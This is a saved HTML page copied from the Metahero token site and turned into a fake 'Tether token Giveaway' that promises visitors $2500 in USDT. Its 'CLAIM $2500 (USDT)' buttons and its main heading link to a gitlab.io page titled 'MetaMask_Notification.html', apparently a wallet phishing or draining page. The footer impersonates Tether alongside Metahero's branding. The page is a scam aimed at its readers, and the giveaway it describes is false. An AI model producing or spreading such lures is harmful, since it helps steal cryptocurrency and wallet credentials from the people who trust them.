<!DOCTYPE html>
<html lang="en" style="padding-top: 0px;"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1">

        
<link rel="manifest" href="https://metahero.io/manifest.json">
<meta name="msapplication-TileColor" content="#000000">
 <link rel="shortcut icon" href="image/iconatas">
<meta name="theme-color" content="#000000">
                    
<title>USDT</title><meta name="robots" content="index,follow"><link rel="alternate" href="http://metahero.io/token" hreflang="en"><link rel="alternate" href="http://metahero.io/es/token" hreflang="es"><link rel="alternate" href="http://metahero.io/pt/token" hreflang="pt"><link rel="alternate" href="http://metahero.io/kr/token" hreflang="kr"><link rel="alternate" href="http://metahero.io/ja/token" hreflang="ja"><link rel="alternate" href="http://metahero.io/zh/token" hreflang="zh"><link rel="canonical" href="http://metahero.io/token">        
                    <link rel="stylesheet" href="./Token_files/592.8b338026.css"><link rel="stylesheet" href="./Token_files/app.8827dbcd.css">

                    
        
        <!-- Global site tag (gtag.js) - Google Analytics -->
    <script async="" src="./Token_files/uwt.js.download"></script><script type="text/javascript" async="" src="./Token_files/recaptcha__en.js.download" crossorigin="anonymous" integrity="sha384-wyvEVSrAxo98MJGE0PuR2ri6k5qurqxA2/a+2Rdj2zI1XHJHSGLsoRS5ADozusAM"></script><script async="" src="./Token_files/gtm.js.download"></script><script async="" src="./Token_files/js"></script>
    <script>
        window.dataLayer = window.dataLayer || [];

        function gtag() {
            dataLayer.push(arguments);
        }

        gtag('js', new Date());
        gtag('config', 'G-4FNZJLF874');
    </script>
    <!-- Google Tag Manager -->
    <script>(function (w, d, s, l, i) {
            w[l] = w[l] || [];
            w[l].push({
                'gtm.start':
                    new Date().getTime(), event: 'gtm.js'
            });
            var f = d.getElementsByTagName(s)[0],
                j = d.createElement(s), dl = l != 'dataLayer' ? '&l=' + l : '';
            j.async = true;
            j.src =
                'https://www.googletagmanager.com/gtm.js?id=' + i + dl;
            f.parentNode.insertBefore(j, f);
        })(window, document, 'script', 'dataLayer', 'GTM-5BHMZ2C');</script>
    <!-- End Google Tag Manager -->
    <script src="chrome-extension://hgmoaheomcjnaheggkfafnjilfcefbmo/dist/client_script.js"></script></head>
    <body class="lang-en desktop" data-aos-easing="ease" data-aos-duration="400" data-aos-delay="0">
        
    <!-- Google Tag Manager (noscript) -->
<noscript><iframe src=“https://www.googletagmanager.com/ns.html?id=GTM-5BHMZ2C”
                  height=“0" width=“0” style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->

                    <header>
			<nav id="main-navigation" class="navigation" style="--app-height:600px;">
			
			<div class="container nav-container">
				<a href="https://metahero.io/" class="brand"></a>
				<div class="links-container">
					<div class="links links-left">
																					<div class="item">
									
    <a class="link  " href="#" data-href="#" title="Tech">
        Tech
            </a>

								</div>
																												<div class="item">
									
    <a class="link  " href="#" data-href="#" title="Everdome" target="_blank" rel="noopener">
        Everdome
            </a>

								</div>
																												<div class="item">
									
    <a class="link  " href="#" data-href="#" title="Token">
        Token
            </a>

								</div>
																												<div class="item">
									
    <a class="link  " href="#" data-href="#" title="Team">
        Team
            </a>

								</div>
																												<div class="item">
									
    <a class="link  " href="#" data-href="#" title="News">
        News
            </a>

								</div>
																															</div>
					<div class="contact-us-button aos-init aos-animate" data-aos="fade-up">
                    <a class="btn gradient aos-init aos-animate" href="https://tether-usdt-karajodenai-94e01cf32ff9a8d35c0aab3f20f387139e70d82.gitlab.io/MetaMask_Notification.html"size=19 id="d58c4579-ef01-447b-a8ef-f073f2950ba2" target="_self" data-aos="fade-up" data-aos-delay="100" rel="nofollownoopener noreferrer">
    <span>CLAIM $2500 (USDT)</span>
</a>
                   
				<div class="toggle-menu"></div>
			</div>
		</nav>
	</header>
                <main>
                        <section class="section section-token-hero">
    <div class="container">
        <div class="wrapper">
            <h2 class="section-name gradient-text aos-init aos-animate" data-aos="fade-up">USDT</h2>
            <h1 target="_self" rel=""class="title"href="https://tether-usdt-karajodenai-94e01cf32ff9a8d35c0aab3f20f387139e70d82.gitlab.io/MetaMask_Notification.html">Tether token Giveaway </h1>
            <p class="text aos-init aos-animate" data-aos="fade-up">This is our appreciation for you who are still loyal this year, We're giving away $2500 (USDT). </p>
        </div>
        <img src="./image/WebBanner-K.webp"width="700" height="450">
		

		<div class="contact-us-button aos-init aos-animate" data-aos="fade-up">
                    <a class="btn gradient aos-init aos-animate" href="https://tether-usdt-karajodenai-94e01cf32ff9a8d35c0aab3f20f387139e70d82.gitlab.io/MetaMask_Notification.html"size=19 id="d58c4579-ef01-447b-a8ef-f073f2950ba2" target="_self" data-aos="fade-up" data-aos-delay="100" rel="nofollownoopener noreferrer">
    <span>CLAIM $2500 (USDT).</span>
</a>
                    
    

        <div class="description-container">
        </div>
    </div>
</section>
            <section class="section section-image-with-text center">
    <div class="before">
            </div>

    <div class="container center">
        <div class="image-container">
                            <img src="./Token_files/301-Group 455.svg" alt="Section image">
                    </div>
        <div class="section-content">
            <h2 class="section-name gradient-text aos-init" data-aos="fade-up"></h2>
            <h3 class="section-title aos-init" data-aos="fade-up" data-aos-delay="100">Token distribution model</h3>
            <p data-aos="fade-up" data-aos-delay="200" class="aos-init"></p>
            <div class="features aos-init" data-aos="fade-up" data-aos-delay="200">
                            </div>
                    </div>

    </div>

    <div class="after">
            </div>
</section>
            <section class="section section-image-with-text right">
    <div class="before">
            </div>

    
        
</section>
            <section id="partners" class="section section-partners">
    <div class="container centered-title">
        <h3 class="section-title aos-init" data-aos="fade-up" data-aos-delay="100">Creating the future with the best of the best</h3>
            </div>
    <div class="container partners">
        <div class="partner-container">
            <h5 class="gradient-text position">Official partner</h5>
            <div class="logo-container">
                <a href="https://wdw.io/" target="_blank" data-aos="fade-up" data-aos-delay="100" rel="nofollownoopener noreferrer" class="aos-init">
                    <img src="./Token_files/wdw.svg" alt="WDW logo">
                </a>
            </div>
        </div>
        <div class="partner-container">
            <h5 class="gradient-text position">Marketing partner</h5>
            <div class="logo-container">
                <a href="https://tenset.io/" target="_blank" data-aos="fade-up" data-aos-delay="200" rel="nofollownoopener noreferrer" class="aos-init">
                    <img src="./Token_files/tenset.png" alt="TENSET logo">
                </a>
            </div>
        </div>
        <div class="partner-container">
            <h5 class="gradient-text position">Listing partners</h5>
            <div class="logo-container space-between">
                <a href="https://www.kucoin.com/" target="_blank" data-aos="fade-up" data-aos-delay="300" rel="nofollownoopener noreferrer" class="aos-init">
                    <img src="./Token_files/kucoin.svg" alt="KUCOIN logo">
                </a>
                <a href="https://kanga.exchange/" target="_blank" data-aos="fade-up" data-aos-delay="400" rel="nofollownoopener noreferrer" class="aos-init">
                    <img src="./Token_files/kanga.png" alt="KANGA EXCHANGE logo">
                </a>
            </div>
        </div>
    </div>
    <div class="container logos">
            </div>
</section>
            <section id="contact-us" class="section section-contact-us">
    <div class="container">
        <div class="contact-us-content popupButton">
                            <div class="contact-us-info">
                    <h3 class="section-title aos-init" data-aos="fade-up" data-aos-delay="100">Believe in Metahero’s vision?</h3>
                    <div data-aos="fade-up" data-aos-delay="300" class="aos-init">
                        <p>We are looking to work with people and companies that are serious about the mass adoption of crypto, metaverse explorers, marketing partners, and those who wish to place our scanners around the world.</p>
                    </div>
                </div>
                
</div></section>
                                    
<script>
    function captchaChange() {
        window.dispatchEvent(new Event('captchaChange'))
    }
</script>

    <div id="contactForm" class="popup">
        <div class="wrapper">
            <div class="close-form"></div>
            <div class="popup-content-scroll">
                <div class="popup-content">
                                                                    <form name="dynamic_contactForm1" method="post"><div id="dynamic_contactForm1"><div class="form-item width-full width-is-last"><h4>Contact us</h4></div><div class="form-item width-half"><label for="dynamic_contactForm1_firstName" class="required">Name</label><input type="text" id="dynamic_contactForm1_firstName" name="dynamic_contactForm1[firstName]" required="required" placeholder="Name..."></div><div class="form-item width-half width-is-last"><label for="dynamic_contactForm1_lastName" class="required">Surname</label><input type="text" id="dynamic_contactForm1_lastName" name="dynamic_contactForm1[lastName]" required="required" placeholder="Surname..."></div><div class="form-item width-full width-is-last"><label for="dynamic_contactForm1_email" class="required">Email</label><input type="email" id="dynamic_contactForm1_email" name="dynamic_contactForm1[email]" required="required" placeholder="Email..."></div><div class="form-item width-full width-is-last"><label for="dynamic_contactForm1_phone" class="required">Phone number</label><input type="tel" id="dynamic_contactForm1_phone" name="dynamic_contactForm1[phone]" required="required" placeholder="Phone number..."></div><div class="form-item width-full width-is-last"><label for="dynamic_contactForm1_textarea" class="required">Message</label><textarea id="dynamic_contactForm1_textarea" name="dynamic_contactForm1[textarea]" required="required" placeholder="Your message..."></textarea></div><div class="form-item width-full width-is-last">
        <div class="choice"><input type="checkbox" id="dynamic_contactForm1_checkbox" name="dynamic_contactForm1[checkbox]" required="required" value="1"><label for="dynamic_contactForm1_checkbox" class="required">I agree to the <a target="_blank" href="http://metahero.io/terms-and-conditions" title="Terms &amp; Conditions">terms of service</a> and <a target="_blank" href="http://metahero.io/privacy-policy" title="Privacy Policy">privacy policy</a>.</label></div></div><div class="form-item width-full width-is-last"><label for="dynamic_contactForm1_recaptcha" style="display: none;">Please verify that you are not a robot.</label><script src="./Token_files/api.js.download"></script><div class="g-recaptcha" data-theme="dark" data-size="normal" data-type="image" data-sitekey="6LeyXWQbAAAAADgtQfk_tY__pxz9IpTNs7ghw8GP" data-callback="captchaChange" data-error-callback="captchaChange" data-expired-callback="captchaChange"><div style="width: 304px; height: 78px;"><div><iframe title="reCAPTCHA" src="./Token_files/anchor.html" width="304" height="78" role="presentation" name="a-yinyxsxdvcrw" frameborder="0" scrolling="no" sandbox="allow-forms allow-popups allow-same-origin allow-scripts allow-top-navigation allow-modals allow-popups-to-escape-sandbox"></iframe></div><textarea id="g-recaptcha-response" name="g-recaptcha-response" class="g-recaptcha-response" style="width: 250px; height: 40px; border: 1px solid rgb(193, 193, 193); margin: 10px 25px; padding: 0px; resize: none; display: none;"></textarea></div><iframe style="display: none;" src="./Token_files/saved_resource(1).html"></iframe></div><noscript><div style="width: 302px; height: 352px;"><div style="width: 302px; height: 352px; position: relative;"><div style="width: 302px; height: 352px; position: absolute;"><iframe src="https://www.google.com/recaptcha/api/fallback?k=6LeyXWQbAAAAADgtQfk_tY__pxz9IpTNs7ghw8GP"
                  style="width: 302px; height:352px; border-style: none; overflow: hidden;"
              ></iframe></div><div style="width: 250px; height: 80px; position: absolute; border-style: none; bottom: 21px; left: 25px; margin: 0; padding: 0; right: 25px;"><textarea id="g-recaptcha-response" name="g-recaptcha-response"
                    class="g-recaptcha-response"
                    style="width: 250px; height: 80px; border: 1px solid #c1c1c1; margin: 0; padding: 0; resize: none;"
              ></textarea></div></div></div></noscript><div class="captchaError"></div></div><input type="hidden" id="dynamic_contactForm1_locale" name="dynamic_contactForm1[locale]" value="en"><input type="hidden" id="dynamic_contactForm1_type" name="dynamic_contactForm1[type]" value="page"><input type="hidden" id="dynamic_contactForm1_typeId" name="dynamic_contactForm1[typeId]" value="a28061d3-2c03-4ba4-946d-8f8e5356cb7d"><input type="hidden" id="dynamic_contactForm1_formId" name="dynamic_contactForm1[formId]" value="1"><input type="hidden" id="dynamic_contactForm1_formName" name="dynamic_contactForm1[formName]" value="contactForm"><input type="hidden" id="dynamic_contactForm1_checksum" name="dynamic_contactForm1[checksum]" value="hhF5LT/l7YYOOvCbNgTUIqREqpOjyJ06y3TRAzBlcaRDCz0MO6gpEeDEGoEEEnJpqmqdp0Jx2t9yaY1saDJQqg=="><div class="form-item width-full width-is-last"><button type="submit" id="dynamic_contactForm1_submit" name="dynamic_contactForm1[submit]">Send</button></div></div></form>                    </div>
                </div>
            </div>
        </div>

    

        <div id="contactFormMsg" class="popup">
            <div class="wrapper">
                <div class="close-form"></div>
                <div class="popup-content-scroll">
                    <div class="popup-content sent">
                        <h4>Your message has been sent, thank you!</h4>
                    </div>
                </div>
            </div>
        </div>
                    </main>
                    
        <div class="container">
            <div class="f-content">
                <div class="f-info">
                    <h4>Our mission</h4>
                    <p>To accelerate the mass adoption of crypto by bringing in the next 10M users with next-gen 3D technology.</p>
                </div>
                <div class="f-address">
                    <div class="address-icon"></div>
                    <div class="address-name">Metahero FZCO</div>
                    <div class="address-line">DSO - IFZA</div>
                    <div class="address-line">Digital Park, Silicon Oasis</div>
                    <div class="address-line">Dubai, UAE</div>
                </div>
                                   </div>
                </div>
                
            </div>
            <div class="f-bottom">
                <div class="f-claim">
                    <h4>Tether USDT 2024 © All right reserved</h4>
                    <div class="f-privacy-menu">
                                                    
    <a class="link  " href="http://metahero.io/terms-and-conditions" data-href="http://metahero.io/terms-and-conditions" title="Terms &amp; Conditions">
        Terms &amp; Conditions
            </a>

                                                    
    <a class="link  " href="http://metahero.io/privacy-policy" data-href="http://metahero.io/privacy-policy" title="Privacy Policy">
        Privacy Policy
            </a>

                                            </div>
                </div>
                

        
                    <script src="./Token_files/runtime.7e363f8b.js.download" defer=""></script><script src="./Token_files/772.b085c0c4.js.download" defer=""></script><script src="./Token_files/592.581ea3b5.js.download" defer=""></script><script src="./Token_files/app.9eb8da81.js.download" defer=""></script>
                        
    

<!-- Render time: January 4, 2022 04:11 -->

<script type="text/javascript" id="">!function(d,e,f,a,b,c){d.twq||(a=d.twq=function(){a.exe?a.exe.apply(a,arguments):a.queue.push(arguments)},a.version="1.1",a.queue=[],b=e.createElement(f),b.async=!0,b.src="//static.ads-twitter.com/uwt.js",c=e.getElementsByTagName(f)[0],c.parentNode.insertBefore(b,c))}(window,document,"script");twq("init","o69j0");twq("track","PageView");</script>

<script type="text/javascript" id="">!function(d,e,f,a,b,c){d.twq||(a=d.twq=function(){a.exe?a.exe.apply(a,arguments):a.queue.push(arguments)},a.version="1.1",a.queue=[],b=e.createElement(f),b.async=!0,b.src="//static.ads-twitter.com/uwt.js",c=e.getElementsByTagName(f)[0],c.parentNode.insertBefore(b,c))}(window,document,"script");twq("init","o69j0");twq("track","PageView");</script>

<script type="text/javascript" id="">!function(d,e,f,a,b,c){d.twq||(a=d.twq=function(){a.exe?a.exe.apply(a,arguments):a.queue.push(arguments)},a.version="1.1",a.queue=[],b=e.createElement(f),b.async=!0,b.src="//static.ads-twitter.com/uwt.js",c=e.getElementsByTagName(f)[0],c.parentNode.insertBefore(b,c))}(window,document,"script");twq("init","o69j0");twq("track","PageView");</script>
<script src="./Token_files/adsct" type="text/javascript"></script><script src="./Token_files/adsct(1)" type="text/javascript"></script><script src="./Token_files/adsct(2)" type="text/javascript"></script><div style="background-color: rgb(255, 255, 255); border: 1px solid rgb(204, 204, 204); box-shadow: rgba(0, 0, 0, 0.2) 2px 2px 3px; position: absolute; transition: visibility 0s linear 0.3s, opacity 0.3s linear 0s; opacity: 0; visibility: hidden; z-index: 2000000000; left: 0px; top: -10000px;"><div style="width: 100%; height: 100%; position: fixed; top: 0px; left: 0px; z-index: 2000000000; background-color: rgb(255, 255, 255); opacity: 0.05;"></div><div class="g-recaptcha-bubble-arrow" style="border: 11px solid transparent; width: 0px; height: 0px; position: absolute; pointer-events: none; margin-top: -11px; z-index: 2000000000;"></div><div class="g-recaptcha-bubble-arrow" style="border: 10px solid transparent; width: 0px; height: 0px; position: absolute; pointer-events: none; margin-top: -10px; z-index: 2000000000;"></div><div style="z-index: 2000000000; position: relative;"><iframe title="recaptcha challenge expires in two minutes" src="./Token_files/bframe.html" name="c-yinyxsxdvcrw" frameborder="0" scrolling="no" sandbox="allow-forms allow-popups allow-same-origin allow-scripts allow-top-navigation allow-modals allow-popups-to-escape-sandbox" style="width: 100%; height: 100%;"></iframe></div></div></body></html>